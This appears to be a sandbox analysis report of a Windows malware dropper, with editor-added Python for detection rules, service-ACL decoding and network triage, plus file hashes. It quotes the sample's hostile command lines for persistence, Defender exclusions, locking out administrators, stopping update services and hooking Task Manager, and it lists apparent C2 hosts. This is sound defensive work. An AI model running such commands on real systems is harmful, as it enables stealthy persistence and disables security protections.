C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0
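
The schtasks, CACLS, netsh, sc, powercfg and PowerShell command lines above are the part of this listing a detection engineer turns into rules: a scheduled task that re-launches the dropper every minute, a self-protection ACL on the dropped file and its directory, a firewall allow rule for a fake csrss.exe under C:\Windows\rss, a service DACL with a deny ACE for Administrators, Defender path exclusions, stopping the Windows Update services, disabling sleep, rundll32 loading a DLL from AppData\Roaming, and an injector that hooks NtQuerySystemInformation in Task Manager. The Python below is an added example and is not part of the sandbox report: a small rule set that tags each command line with the technique it shows and totals hits per tactic. The sample input is copied from the process list above (plus one benign CompPkgSrv line); the rule names and tactic labels are the editor's own.

```python
import re

# Detection rules: name -> (tactic label, regex over the raw command line).
# Patterns are written against the command lines in the process list; the
# names and tactic labels are the editor's choice, not report output.
RULES = {
    "schtasks-minute-persistence": ("persistence",
        re.compile(r'schtasks(?:\.exe)?"?\s+/create\b.*/sc\s+minute\b', re.I)),
    "schtasks-onlogon-highest": ("persistence",
        re.compile(r'schtasks(?:\.exe)?"?\s+/create\b.*/sc\s+onlogon\b.*/rl\s+highest\b', re.I)),
    "register-scheduledtask-system": ("persistence",
        re.compile(r"Register-ScheduledTask\b.*-User\s+'?System'?.*-RunLevel\s+'?Highest'?", re.I)),
    "cacls-deny-owner": ("defense-evasion",          # "/P user:N" strips the user's own access
        re.compile(r'\bcacls\b.*\s/P\s+"?[^"\s]+:N\b', re.I)),
    "netsh-firewall-allow": ("defense-evasion",
        re.compile(r'netsh\s+advfirewall\s+firewall\s+add\s+rule\b.*action=allow', re.I)),
    "sc-sdset-deny-admins": ("defense-evasion",      # deny ACE whose trustee is BA (Administrators)
        re.compile(r'\bsc(?:\.exe)?\s+sdset\s+\S+\s+\S*\(D;[^)]*;;;BA\)', re.I)),
    "defender-exclusion": ("defense-evasion",
        re.compile(r'Add-MpPreference\b.*-ExclusionPath\b', re.I)),
    "stop-update-services": ("impact",
        re.compile(r'\bsc\s+stop\s+(?:UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)\b', re.I)),
    "powercfg-no-sleep": ("impact",
        re.compile(r'powercfg\s+/x\s+-(?:hibernate|standby)-timeout-(?:ac|dc)\s+0\b', re.I)),
    "rundll32-appdata-dll": ("execution",
        re.compile(r'rundll32(?:\.exe)?"?\s+\S*\\AppData\\Roaming\\[^,]+\.dll\s*,', re.I)),
    "taskmgr-hook-injector": ("defense-evasion",
        re.compile(r'injector\.exe\s+taskmgr\.exe\s+.*NtQuerySystemInformationHook\.dll', re.I)),
}

# Sample input: command lines copied from the process list above, plus one benign line.
POWERSHELL_TASK_LINE = r"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }"""
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F',
    r'CACLS "explothe.exe" /P "Admin:N"',
    r'CACLS "explothe.exe" /P "Admin:R" /E',
    r'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes',
    r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F',
    r'sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force',
    r'sc stop WaaSMedicSvc',
    r'powercfg /x -standby-timeout-ac 0',
    r'"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main',
    r'C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll',
    POWERSHELL_TASK_LINE,
    r'C:\Windows\System32\CompPkgSrv.exe -Embedding',   # benign: no rule should fire
]


def classify(cmdline):
    """Return the sorted names of every rule the command line matches."""
    return sorted(name for name, (_tactic, rx) in RULES.items() if rx.search(cmdline))


def triage(cmdlines):
    """Map each command line that matched at least one rule to its rule names."""
    hits = {}
    for cmdline in cmdlines:
        matched = classify(cmdline)
        if matched:
            hits[cmdline] = matched
    return hits


def tactic_histogram(cmdlines):
    """Count rule hits per tactic label across the whole process list."""
    counts = {}
    for matched in triage(cmdlines).values():
        for name in matched:
            tactic = RULES[name][0]
            counts[tactic] = counts.get(tactic, 0) + 1
    return counts


if __name__ == "__main__":
    for cmdline, matched in triage(SAMPLE_CMDLINES).items():
        print(", ".join(matched), "<-", cmdline[:80])
    print(tactic_histogram(SAMPLE_CMDLINES))
```

The CACLS pair is worth reading as one operation: `/P "Admin:N"` replaces the user's permissions on explothe.exe and its directory with none, and `/P "Admin:R" /E` then edits read back in, so the account that ran the dropper can no longer delete or overwrite it. An elevated `icacls <path> /reset` (preceded by `takeown /f <path>` if ownership was also changed) restores the inherited ACL during cleanup.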

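The `sc sdset WinDefender ...` line is easy to skim past because the SDDL is opaque. Decoded, it leaves LocalSystem with its full set of rights, gives Administrators an allow ACE that lacks SERVICE_STOP (WP) and SERVICE_PAUSE_CONTINUE (DT), and then adds an explicit deny for exactly those two rights, so an administrator can neither stop nor pause the fake WinDefender service from services.msc or `sc stop`. The Python below is an added example, not content from the report: it parses the descriptor, computes per-trustee effective rights by walking the DACL in order, and compares the result against a clean-host baseline. That baseline is the descriptor most services report through `sc sdshow` and is an assumption, not something the report states. Administrators keep WRITE_DAC and SERVICE_CHANGE_CONFIG, which is why `sc sdset` with the default descriptor restores control and the service can then be stopped.

```python
import re

# Two-letter SDDL access-right tokens with their meaning for service objects
# (generic and standard rights included so unfamiliar descriptors still parse).
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
}
ACE_TYPES = {"A": "ALLOW", "D": "DENY", "AU": "AUDIT"}
WELL_KNOWN_SIDS = {"SY": "LocalSystem", "BA": "Administrators", "IU": "Interactive",
                   "SU": "ServiceLogon", "WD": "Everyone"}

# Descriptor applied by the sample (copied from the sc sdset command line above).
WINDEFENDER_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)"
                    "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                    "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
# Assumed baseline: the descriptor most services report via `sc sdshow` on a clean host.
DEFAULT_SERVICE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                        "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                        "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")


def parse_rights(token):
    """Expand a rights string such as 'WPDT' into named rights; hex masks are kept verbatim."""
    if token.startswith("0x"):
        return {token}
    if len(token) % 2:
        raise ValueError(f"odd-length rights string: {token!r}")
    return {SERVICE_RIGHTS.get(token[i:i + 2], token[i:i + 2]) for i in range(0, len(token), 2)}


def parse_sddl(sddl):
    """Split an SDDL string into its DACL ('D') and SACL ('S') as ordered ACE lists."""
    acls = {"D": [], "S": []}
    for kind, _ctrl_flags, body in re.findall(r"([DS]):([A-Z]*)((?:\([^)]*\))*)", sddl):
        for ace in re.findall(r"\(([^)]*)\)", body):
            fields = ace.split(";")
            if len(fields) != 6:
                raise ValueError(f"malformed ACE: ({ace})")
            ace_type, flags, rights, _object_guid, _inherit_guid, sid = fields
            acls[kind].append({
                "type": ACE_TYPES.get(ace_type, ace_type),
                "flags": flags,                       # e.g. FA on the SACL = audit failed access
                "rights": parse_rights(rights),
                "trustee": WELL_KNOWN_SIDS.get(sid, sid),
            })
    return acls


def effective_rights(acl, trustee):
    """Walk the DACL in order; for each right, the first ACE naming it for the trustee wins.
    Group membership is not expanded: only ACEs naming the trustee itself are considered."""
    granted, denied = set(), set()
    for ace in acl:
        if ace["trustee"] != trustee:
            continue
        if ace["type"] == "ALLOW":
            granted |= ace["rights"] - denied
        elif ace["type"] == "DENY":
            denied |= ace["rights"] - granted
    return granted, denied


def lockdown_findings(sddl, baseline=DEFAULT_SERVICE_SDDL, trustee="Administrators"):
    """What the descriptor takes away from the trustee relative to the baseline, and which
    rights are left that still allow repair (rewriting the DACL or reconfiguring the service)."""
    granted, denied = effective_rights(parse_sddl(sddl)["D"], trustee)
    base_granted, _ = effective_rights(parse_sddl(baseline)["D"], trustee)
    repair_rights = {"WRITE_DAC", "WRITE_OWNER", "SERVICE_CHANGE_CONFIG", "DELETE"}
    return {
        "explicitly_denied": sorted(denied),
        "missing_vs_baseline": sorted(base_granted - granted),
        "repair_rights_left": sorted(granted & repair_rights),
    }


if __name__ == "__main__":
    for key, value in lockdown_findings(WINDEFENDER_SDDL).items():
        print(f"{key}: {value}")
```

The ACE walk matters because Windows evaluates ACEs in order: the deny ACE here sits after the Administrators allow ACE, which is non-canonical, but since that allow ACE no longer carries WP or DT the deny still wins for both rights. A descriptor that kept WP in the allow ACE and appended the same deny would behave differently, and the function above reflects that.
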
Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 112.208.253.8.in-addr.arpa udp
RU 5.42.92.88:80 5.42.92.88 tcp
US 8.8.8.8:53 88.92.42.5.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 254.22.238.8.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
FI 77.91.68.52:80 77.91.68.52 tcp
RU 5.42.92.88:80 5.42.92.88 tcp
US 8.8.8.8:53 52.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
TR 185.216.70.222:80 185.216.70.222 tcp
RU 5.42.92.88:80 5.42.92.88 tcp
US 8.8.8.8:53 222.70.216.185.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
BG 171.22.28.213:80 171.22.28.213 tcp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
IT 185.196.9.65:80 tcp
NL 85.209.176.128:80 tcp
US 8.8.8.8:53 65.9.196.185.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 www.facebook.com udp
NL 157.240.201.35:443 www.facebook.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 16.43.107.13.in-addr.arpa udp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
NL 142.250.179.141:443 accounts.google.com udp
FI 77.91.124.55:19071 tcp
TR 185.216.70.238:37515 tcp
US 8.8.8.8:53 238.70.216.185.in-addr.arpa udp
US 8.8.8.8:53 learn.microsoft.com udp
NL 104.85.2.139:443 learn.microsoft.com tcp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 59.82.57.23.in-addr.arpa udp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.12.31:443 api.ip.sb tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 139.2.85.104.in-addr.arpa udp
US 8.8.8.8:53 31.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 js.monitor.azure.com udp
US 13.107.246.67:443 js.monitor.azure.com tcp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 13.107.246.67:443 wcpstatic.microsoft.com tcp
US 8.8.8.8:53 mscom.demdex.net udp
IE 34.252.33.233:443 mscom.demdex.net tcp
US 8.8.8.8:53 target.microsoft.com udp
US 8.8.8.8:53 microsoftmscompoc.tt.omtrdc.net udp
US 8.8.8.8:53 67.246.107.13.in-addr.arpa udp
US 8.8.8.8:53 233.33.252.34.in-addr.arpa udp
US 8.8.8.8:53 browser.events.data.microsoft.com udp
FR 51.11.192.49:443 browser.events.data.microsoft.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FR 51.11.192.49:443 browser.events.data.microsoft.com tcp
US 8.8.8.8:53 49.192.11.51.in-addr.arpa udp
FI 77.91.124.71:4341 tcp
US 8.8.8.8:53 71.124.91.77.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 h2o.activebuy.top udp
MD 37.221.65.143:8443 h2o.activebuy.top tcp
US 8.8.8.8:53 hellouts.fun udp
US 188.114.97.0:80 hellouts.fun tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 143.65.221.37.in-addr.arpa udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 188.114.97.0:80 hellouts.fun tcp
NL 85.209.176.128:80 tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 8.8.8.8:53 10.5.240.157.in-addr.arpa udp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
FI 77.91.124.55:19071 tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 127.175.169.194.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
NL 85.209.176.128:80 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 7137a84c-7962-488a-ad7e-5f4a32d4b793.uuid.realupdate.ru udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
NL 85.209.176.128:80 tcp
US 8.8.8.8:53 server1.realupdate.ru udp
US 8.8.8.8:53 stun.sipgate.net udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 15.197.250.192:3478 stun.sipgate.net udp
US 8.8.8.8:53 192.250.197.15.in-addr.arpa udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp
BG 185.82.216.96:443 server1.realupdate.ru tcp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.96.0:443 walkinglate.com tcp
US 8.8.8.8:53 96.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
BG 185.82.216.96:443 server1.realupdate.ru tcp
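
The Network table mixes three kinds of rows: resolver noise (every 8.8.8.8:53 lookup and the reverse lookup of each contacted address), traffic from the Edge instances the sample launched (facebook.com, accounts.google.com, Microsoft telemetry), and the connections that matter for blocking: repeated direct-to-IP sessions on unusual ports (77.91.124.55:19071, 185.216.70.238:37515, 77.91.124.71:4341), the throwaway domains, the api.ip.sb lookup used to geolocate the victim, and pastebin.com and cdn.discordapp.com, which are the legitimate hosting services the signature list says are abused. The Python below is an added example and not part of the report: it parses rows in the table's own layout (the Domain column is absent on some rows), drops the noise, buckets the rest and ranks block-list candidates by hit count. The sample rows are a subset copied from the table; the bucket lists (which domains count as abused hosting, platform traffic or an external IP check) are the editor's assumptions.

```python
from collections import Counter
import ipaddress

# Constructed input: a subset of rows copied from the Network table above, in the
# report's "Country Destination Domain Proto" layout (Domain missing on some rows).
NETWORK_SAMPLE = """\
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
RU 5.42.92.88:80 5.42.92.88 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.55:19071 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
US 8.8.8.8:53 www.facebook.com udp
NL 157.240.201.35:443 www.facebook.com tcp
FI 77.91.124.55:19071 tcp
TR 185.216.70.238:37515 tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.12.31:443 api.ip.sb tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
MD 37.221.65.143:8443 h2o.activebuy.top tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 15.197.250.192:3478 stun.sipgate.net udp
US 162.159.129.233:443 cdn.discordapp.com tcp
BG 185.82.216.96:443 server1.realupdate.ru tcp
"""

# Bucket lists are the editor's assumptions, not report output.
ABUSED_HOSTING = {"pastebin.com", "cdn.discordapp.com"}      # dead-drop / payload hosting
EXTERNAL_IP_CHECK = {"api.ip.sb"}                             # victim geolocation lookup
PLATFORM_SUFFIXES = ("microsoft.com", "google.com", "facebook.com", "fbcdn.net",
                     "azure.com", "demdex.net", "omtrdc.net")  # browser / telemetry traffic


def parse_row(line):
    """Parse one table row; the Domain column is optional."""
    parts = line.split()
    if len(parts) == 4:
        country, dest, domain, proto = parts
    elif len(parts) == 3:
        country, dest, proto = parts
        domain = ""
    else:
        raise ValueError(f"unexpected row: {line!r}")
    host, _, port = dest.rpartition(":")
    return {"country": country, "host": host, "port": int(port), "domain": domain, "proto": proto}


def is_ip(text):
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def classify(row):
    """Bucket a row; the '-noise' buckets are sandbox resolver and discovery chatter."""
    if row["port"] == 53 or row["domain"].endswith(".in-addr.arpa"):
        return "dns-noise"
    if row["host"] == "224.0.0.251":
        return "mdns-noise"
    if row["port"] == 3478:
        return "stun"
    domain = row["domain"]
    if domain in EXTERNAL_IP_CHECK:
        return "external-ip-check"
    if domain in ABUSED_HOSTING:
        return "abused-hosting"
    if domain.endswith(PLATFORM_SUFFIXES):
        return "platform-traffic"
    if not domain or is_ip(domain):
        return "direct-ip"
    return "domain"


def summarize(table):
    """Return the parsed rows and a Counter of (bucket, host:port, domain) hits, noise excluded."""
    rows = [parse_row(line) for line in table.splitlines() if line.strip()]
    counts = Counter()
    for row in rows:
        bucket = classify(row)
        if bucket.endswith("-noise"):
            continue
        counts[(bucket, f"{row['host']}:{row['port']}", row["domain"])] += 1
    return rows, counts


def candidate_c2(counts):
    """Direct-to-IP and unknown-domain destinations, most contacted first: the first block list."""
    return sorted(((key, n) for key, n in counts.items() if key[0] in ("direct-ip", "domain")),
                  key=lambda item: (-item[1], item[0]))


if __name__ == "__main__":
    _, counts = summarize(NETWORK_SAMPLE)
    for (bucket, dest, domain), n in candidate_c2(counts):
        print(f"{n:>3}  {bucket:<10} {dest:<22} {domain}")
```

Run over the full table the ranking puts 188.114.97.0:80 (hellouts.fun) first by a wide margin, followed by 77.91.124.55:19071. Where one address fronts several names, as a CDN does, block on the domain rather than the address; the direct-to-IP destinations on non-standard ports can be blocked as addresses.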

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe

MD5 35b976f0aa732d586399ce092d3a32ee
SHA1 5ad590fc6d97f3463b4ba51058feb060a1503b97
SHA256 d73746a9d69ec1d0dd21224ca476dff0b3590747fa2abd43382607ef8f5d8ff3
SHA512 21d6418414349db621475d11c93c33813f42ce235849cecb86685da89b6ef6086bd6d38710326ebf372f15c56817fb48facd35a43abdfc372db8ac824586d920

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe

MD5 9d682c1b03a213f29f9b9de78549f352
SHA1 3ce82826f5ff4d1483a3d3251dc68794a0448c66
SHA256 61491c3ecf26376a0462bba03c883442ce761a8e7834cf951488bfbbb699e20c
SHA512 da85f5df3f2e9749a777859c78a987b5ef9834a6deb2585036dff2356455cb4bd598958bf5ad37da3f1948b6c06440d67f15a04f98ffe37a981d1e32796cf0d3

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe

MD5 5cd60a95fe657ce00446107da8a967c8
SHA1 8b406aeb677638ee1f8b5f34cd2693bcd9e448d1
SHA256 a760587415e0331a0367d9018697f2d5054358096d49bcc2a64b1d50aef22652
SHA512 ff487782d4eede41e40929877f8b2cef03ea4ad4ab2b9be864e31f6b19e925da059d37046e54284adb44ee856728de24d88575d439bd07e12f4d5183801f2fd7

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe

MD5 fbec8f89c49cee4b64b3ff15a0ef538c
SHA1 5e31f5beebff2e1fae89e61c2c2691ee2b8d0bd8
SHA256 becc94bf863d280c45250d501e2acb1e4b67a2514f465b46c237a64cd6308a7d
SHA512 9ffd1e9a3d95fe34bcb1c207afd6af8637bb967e6e0f9084f6a3a862943edb81a18a29bab4c7286b2f10486d5340c143261862f609d542deaef920bb4ed117e3

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe

MD5 22b50c95b39cbbdb00d5a4cd3d4886bd
SHA1 db8326c4fad0064ce3020226e8556e7cce8ce04e
SHA256 160ea596dea538000394fde4ba2d40fd2be5ab50037a77ba3000e927bff84ef1
SHA512 d53e872e03aac73cea2399170a0de74611496c0364ece1d81b8e7591aecc470edc57db63586ceda4bc82589e3b8f39668c49464d962e750dc86099736599f9ac

memory/2716-35-0x0000000074A80000-0x0000000075230000-memory.dmp

memory/2716-36-0x0000000000E40000-0x0000000000E4A000-memory.dmp

memory/2716-37-0x0000000074A80000-0x0000000075230000-memory.dmp

memory/2716-39-0x0000000074A80000-0x0000000075230000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe

MD5 53e28e07671d832a65fbfe3aa38b6678
SHA1 6f9ea0ed8109030511c2c09c848f66bd0d16d1e1
SHA256 5c59db3277aefb761d4b814aaf5f5acd1fd1a0ea154dc565c78b082a3df4566e
SHA512 053f8048230583e741c34f6714c9684ed1312c064cd0c81d99f09e20192b7ddecb53c9c55e4aceac774315315be7e13de98f2cea4e5487f2d9e9dfa2ce3979c9

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe

MD5 35a15fad3767597b01a20d75c3c6889a
SHA1 eef19e2757667578f73c4b5720cf94c2ab6e60c8
SHA256 90ccd84f28e4dd03fb70b8739c4636acbcf8a030404b5a24264afd1acd09ecbc
SHA512 c1ea2659e28130f00869391a33dfdc2a763a710a56de2acaa6c71caa9c1eb5809e7ca1dfa1620ac5c3174052d3e277b832853a137a4663483855295fdab23577

memory/4472-45-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe

MD5 35a15fad3767597b01a20d75c3c6889a
SHA1 eef19e2757667578f73c4b5720cf94c2ab6e60c8
